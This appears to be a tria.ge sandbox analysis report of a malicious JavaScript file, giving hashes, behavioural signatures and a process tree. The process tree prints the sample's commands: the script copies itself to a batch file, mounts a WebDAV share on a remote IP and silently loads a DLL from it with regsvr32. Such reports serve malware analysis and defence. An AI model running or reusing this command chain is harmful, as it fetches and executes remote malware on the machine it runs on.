Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
09/07/2024, 17:08
Static task
static1
Behavioral task
behavioral1
Sample
288623129288629811.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
288623129288629811.js
Resource
win10v2004-20240709-en
General
-
Target
288623129288629811.js
-
Size
5KB
-
MD5
27ec8012c9813c8ff50ebe971de23bfb
-
SHA1
8df64433d6f743c2524c7b210a71b2b29b943a81
-
SHA256
327aad49e2f6cb2b5014d750487a0f3fe5e7102aec23c50407add2ab13b9338e
-
SHA512
07abfb3fac91b07d9642b32615b2d47a5d2cf6d4f6ccf56da6e985e8e3a2f9635d3ffbbe13aff5c74b0f39da2721f1fde84e26bab839a0e7dcb7d34146367423
-
SSDEEP
96:iQlr8O3jvfPlMOOOOrTTPOOOD9VvK6IiojFVYjMYValVgkxVX:vIO7fdMOOO8zOOO51KtjFVYjMYAl6kxR
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2208 wrote to memory of 1016 2208 wscript.exe 83 PID 2208 wrote to memory of 1016 2208 wscript.exe 83 PID 1016 wrote to memory of 212 1016 cmd.exe 86 PID 1016 wrote to memory of 212 1016 cmd.exe 86 PID 1016 wrote to memory of 3048 1016 cmd.exe 87 PID 1016 wrote to memory of 3048 1016 cmd.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\288623129288629811.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\288623129288629811.js" "C:\Users\Admin\\hmidau.bat" && "C:\Users\Admin\\hmidau.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:212
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\419.dll3⤵PID:3048
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD527ec8012c9813c8ff50ebe971de23bfb
SHA18df64433d6f743c2524c7b210a71b2b29b943a81
SHA256327aad49e2f6cb2b5014d750487a0f3fe5e7102aec23c50407add2ab13b9338e
SHA51207abfb3fac91b07d9642b32615b2d47a5d2cf6d4f6ccf56da6e985e8e3a2f9635d3ffbbe13aff5c74b0f39da2721f1fde84e26bab839a0e7dcb7d34146367423